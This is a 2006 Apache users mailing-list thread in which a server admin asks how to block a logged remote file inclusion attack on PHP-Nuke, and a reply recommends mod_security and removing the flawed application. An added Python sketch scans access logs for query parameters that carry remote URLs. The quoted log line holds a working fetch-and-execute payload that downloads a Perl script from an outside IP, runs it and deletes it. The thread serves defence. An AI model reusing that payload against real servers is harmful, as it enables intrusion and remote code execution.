Posted to users@httpd.apache.org by david <dv...@gmail.com> on 2006/08/08 01:01:06 UTC

[users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Hello!

Recently, I've found some entries in my Apache web server log like this:

[IP] - - [05/Aug/2006:02:17:47 +0200] "GET 
/nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? 
HTTP/1.0" 200 220151 "-" "Mozilla/5.0"

As you can see, some attacker tries to use the index.php file to get a 
cmd.txt file from another site.

Is there any way to detect these URLs and stop this by configuring Apache?

I've tried SetEnvIf and RedirectMatch in several ways, with no results:

SetEnvIf Request_URI "(.*)cmd(.*)$" attack

or

RewriteEngine on
RedirectMatch permanent (.*)cmd(.*)$ http://nourl

only works with URLs like:

http://myserver/myfile.php/cmd

not with

http://myserver/myfile.php?cmd

It seems that the Request_URI and RedirectMatch don't work with the 
params on the URL, only with the main URL file.

Thanks.

David



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
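
Added example (not part of the original thread): the message above observes that Request_URI and RedirectMatch only see the path, so a check has to look at the query string separately. This Python sketch does that over access-log lines and flags parameters whose decoded value is a remote URL; the sample log lines, hostnames and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache access-log format (not taken from the thread).
SAMPLE_LOG = '''\
192.0.2.10 - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://example.invalid/cmd.txt?&cmd=id HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
192.0.2.11 - - [05/Aug/2006:02:18:02 +0200] "GET /myfile.php/cmd HTTP/1.0" 404 210 "-" "Mozilla/5.0"
192.0.2.12 - - [05/Aug/2006:02:19:30 +0200] "GET /index.php?page=news&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.13 - - [05/Aug/2006:02:20:11 +0200] "GET /index.php?inc=hTTp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Path-only pattern, the same idea as: SetEnvIf Request_URI "(.*)cmd(.*)$" attack
PATH_ONLY_RE = re.compile(r"cmd")


def split_target(line):
    """Return (path, query) from the request line, or None if it cannot be parsed."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    return path, query


def remote_url_params(query):
    """Names of query parameters whose percent-decoded value is a remote URL."""
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value.strip())]


def scan(log_text):
    """One finding per parseable line: what a path-only rule sees vs. the query."""
    findings = []
    for line in log_text.splitlines():
        parsed = split_target(line)
        if parsed is None:
            continue
        path, query = parsed
        findings.append({"path": path,
                         "path_only_match": bool(PATH_ONLY_RE.search(path)),
                         "remote_params": remote_url_params(query)})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The first and fourth sample lines are missed by the path-only pattern but flagged by the query-string check, while the second matches only on the path.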


Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Posted by Joshua Slive <jo...@slive.ca>.
On 8/8/06, David Velayos <dv...@gmail.com> wrote:
>
> Of course, this is not working (you have to be authenticated to use this
> page as an admin user), but it's a useless waste of bandwidth and I think
> it's better to deny the access by a common security mechanism before. The
> question is that
>
> So, with mod_security can I block suspicious URLs with regexp?

Yes.

Joshua.



Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Posted by David Velayos <dv...@gmail.com>.
Of course, this is not working (you have to be authenticated to use this
page as an admin user), but it's a useless waste of bandwidth and I think
it's better to deny the access by a common security mechanism before. The
question is that

So, with mod_security can I block suspicious URLs with regexp?

2006/8/8, Joshua Slive <jo...@slive.ca>:
>
> On 8/7/06, david <dv...@gmail.com> wrote:
> > Hello!
> >
> > Recently, I've found some entries in my Apache web server log like this:
> >
> > [IP] - - [05/Aug/2006:02:17:47 +0200] "GET
> > /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
> > HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
> >
> > As you can see, some attacker tries to use the index.php file to get a
> > cmd.txt file from another site.
> >
> > Is there any way to detect these URLs and stop this by configuring Apache?
>
> If this is actually working on your server, you need to immediately
> get rid of the application that is allowing it (php-nuke it seems),
> since it has a major security flaw.
>
> In general, mod_security can be used to block suspicious URLs.  But it
> is not a substitute for making sure you only use secure web
> applications.
>
> Joshua.

Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Posted by Joshua Slive <jo...@slive.ca>.
On 8/7/06, david <dv...@gmail.com> wrote:
> Hello!
>
> Recently, I've found some entries in my Apache web server log like this:
>
> [IP] - - [05/Aug/2006:02:17:47 +0200] "GET
> /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
> HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
>
> As you can see, some attacker tries to use the index.php file to get a
> cmd.txt file from another site.
>
> Is there any way to detect these URLs and stop this by configuring Apache?

If this is actually working on your server, you need to immediately
get rid of the application that is allowing it (php-nuke it seems),
since it has a major security flaw.

In general, mod_security can be used to block suspicious URLs.  But it
is not a substitute for making sure you only use secure web
applications.

Joshua.
